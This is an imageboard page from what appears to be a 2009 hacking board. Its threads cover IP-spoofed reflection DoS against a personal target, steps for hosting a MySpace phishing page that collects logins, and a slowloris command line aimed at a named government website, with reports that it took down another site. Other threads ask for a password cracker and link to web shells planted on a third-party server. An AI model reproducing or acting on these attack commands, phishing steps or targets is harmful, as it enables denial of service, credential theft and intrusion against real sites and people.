[711chan]  -  [WT]  [Home] [Manage]

Name
Email
Subject   (new thread)
Message
File
Password  (for post and file deletion)
  • Supported file types are: GIF, JPG, PNG
  • Maximum file size allowed is 1000 KB.
  • Images greater than 200x200 pixels will be thumbnailed.
  • Currently 24 unique user posts. View catalog

  • Blotter updated: 2009-06-15 Show/Hide Show All

File 12465660485.png - (21.46KB , 134x820 , ips.png )
52 No. 52 hide watch expand quickreply [Reply]
I have a list of 100 random IP addresses I generated. I know how to send a datagram. What I don't know is how to create one. Anyone know? Preferably in C++, C is ok, anything that can be ran locally is acceptable.
I want to spoof the source IP of a datagram, like this:

I sends the data packet as target, to about 100 random ip addresses -> replies go to target -> target gets pwned, amirite?

So I just want to know how to create & send the packets. Can has helps?

tl;dr -- Google "reflection attack" -> find out how to do it -> tell me. Tyvm.

Pic related, it's output from the ip generating thing that took two minutes to write...
1 post omitted. Click Reply to view.
>> No. 55
>>54
That's a better idea, actually. Any idea on ip spoofing though? Say the target IP was 0.0.0.0; I want to send a data packet to everyone from 0.0.0.1-9.9.9.9 (for example), so they reply to 0.0.0.0 and 0.0.0.0 get's owned.

I just noticed, all my generated IPs end with a period :l
>> No. 58
>>55
That is basicly what a smurf attack attack is, except smurf uses broadcast to conduct the attack. This won't really work that well because you will still have to generate the same amount of traffic, so you had better have a bigger pipe than the victim
>> No. 59
>>58
Good point.

How can I do this more efficiently then? Because I'm fairly sure he has a better connection, moar bandwidths and more data forces than me.


File 124666436966.jpg - (48.47KB , 638x576 , pokeman fag.jpg )
56 No. 56 hide watch quickreply [Reply]
recommend gd password cracker

http://anonym.to/http://www.youtube.com/watch?v=Yavx9yxTrsw

must delete vids agen!!!


File 124471754766.gif - (12.71KB , 300x300 , myspace.gif )
9 No. 9 hide watch expand quickreply [Reply]
Since we have to start all over again i thought id post the method on how to phish myspace pages.
first you want to save this code http://pastebin.com/f6fb6caa6 in Notepad as .PHP then make a myspace.txt upload the txt and php to a hosting site that supports PHP. All the logins and passwords will be in the myspace.txt
11 posts and 1 image omitted. Click Reply to view.
>> No. 48
>>23
what >>12 said

Once they figure it out itll get cancelled though
>> No. 49
http://anonym.to/http://x10hosting.com/
copy and paste into browser im to lazy to anonym.to.
Anyways, i used to use this hosting when i phished myspace back when there was myspays, its decent, fast, and supports php. Hope that helps.
>> No. 53
I have a webpage on 000webhost.com. They check for shit like this but I'll have downloaded the text file by then...

I'll upload the file to mediafire; you can all have it because I'm pro :P


File 124554463943.jpg - (20.10KB , 400x268 , 443248a-i3_0.jpg )
25 No. 25 hide watch expand quickreply [Reply]
forget about th e lazers. here comes the slow loris! it looks so harmless and cute, but it can take down some webservers with one single pc without much bandwidth.

http://anonym.to/http://www.milw0rm.com/exploits/8976

apache are affected, iis aren't.

works well on this website:
./slowloris.pl -dns www.president.ir -port 80 -timeout 300 -num 2000 -tcpto 5
11 posts and 1 image omitted. Click Reply to view.
>> No. 45
this shit is epic
also, 45 get. amirite?
>> No. 46
>>43

pic pic pic pic

i can't even bring anything down
>> No. 51
>>43
it worked on http://anonym.to/http://britneyspears.ac/ for a little while


File 124616497515.gif - (832.02KB , 256x192 , 1180269612433.gif )
50 No. 50 hide watch quickreply [Reply]
#!/bin/sh
#ukill.sh - written to pwn compromised accounts
#kthx :)


ps -aufx | grep $1 | awk -F ' ' '{print "kill "$2}' > die.sh && sh die.sh && echo "All user processes killed\n"
netstat -pant | grep $1 | awk -F ' ' '{print $7}' | awk -F '\/' '{print "kill "$1}' > con.sh && sh con.sh
echo "All user's connections killed.\n"
echo "Enter new password for user\n\n"
passwd $1

echo "Ok, send an email to $1 telling him blahz."


File 12458473598.jpg - (122.50KB , 600x603 , Doing science.jpg )
44 No. 44 hide watch quickreply [Reply]
What is a script I can run to change the time delay before the screen turns off in the always on profile from 20 min to one, and if ran again back to 20. xpsp3. If no one knows a script, please tell me what registry value to change, I'll try script it myself.


File 124559267585.jpg - (22.55KB , 640x480 , 2d06b415cf892c9b35f4beb6414c2e9a.jpg )
29 No. 29 hide watch quickreply [Reply]
I think I had this up here before.
#/bin/sh if [ $1 == "" ]; then exit else DUMPDIR="$1" shift fi wget --limit-rate=150k -erobots=off --span-hosts -w 2 -N -nd -P ${DUMPDIR}/ -U Mozilla/5.0 -r -l 1 -A.jpg,.png -I "/*/src" $* #For all the images in a thread #wget -U "Mozilla/5.0" -erobots=off --span-hosts -w 2 -nc -nd -P ${DUMPDIR}/ -U Mozilla/5.0 -r -l 2 -A.jpg,.png -I "/*/src","/*/res" $* #Uncomment this line for all images in a page of a board.



File 124554309064.jpg - (41.73KB , 640x480 , 4GIFs_com164.jpg )
24 No. 24 hide watch quickreply [Reply]
EVAL(6)


File 124478745325.jpg - (47.15KB , 699x508 , 1242353125001.jpg )
13 No. 13 hide watch quickreply [Reply]
some shells for you

http://www.ldk-metal-forum.no-ip.org/phpmyadmin//config/
>> No. 14
14 get fuck you


Delete post []
Password  
Report post
Reason  
Previous [0] Next